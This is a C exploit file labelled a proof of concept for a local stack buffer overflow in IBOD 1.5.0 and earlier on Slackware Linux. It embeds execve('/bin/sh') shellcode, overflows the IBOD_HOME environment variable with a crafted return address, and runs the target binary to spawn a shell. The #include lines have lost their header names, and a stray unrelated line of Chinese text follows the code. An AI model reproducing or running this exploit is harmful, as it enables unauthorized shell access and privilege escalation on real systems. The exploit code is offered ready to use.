/* ibod_bof.c * * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept) * * Tested in Slackware Linux 10.0 * * by CoKi * No System Group - http://www.nosystem.com.ar */ #include #include #define BUFFER 540 + 4 char shellcode[]= "\x31\xc0" /* xor %eax,%eax */ "\x31\xd2" /* xor %edx,%edx */ "\x52" /* push %edx */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x52" /* push %edx */ "\x53" /* push %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\xb0\x0b" /* mov $0xb,%al */ "\xcd\x80"; /* int $0x80 */ void use(char *program); int main(int argc, char *argv[]) { FILE *file; char buf[BUFFER], *path, tmp[BUFFER]; char *buffer=buf; int ret; if(argc != 2) use(argv[0]); path = argv[1]; if((file = fopen(path, "r")) == NULL) { printf(" Failed to open file!\n"); exit(1); } ret = 0xbffffffa - strlen(shellcode) - strlen(path); bzero(buf, sizeof(buf)); memset(buffer, 'A', BUFFER-4); sprintf(tmp, "%s", &ret); strncat(buf, tmp, 4); printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n"); printf(" by CoKi \n\n"); setenv("IBOD_HOME", buf, 1); setenv("SHELLCODE", shellcode, 1); execl(path, path, NULL); } void use(char *program) { printf(" Use: %s \n", program); exit(1); }

亚洲欧美在线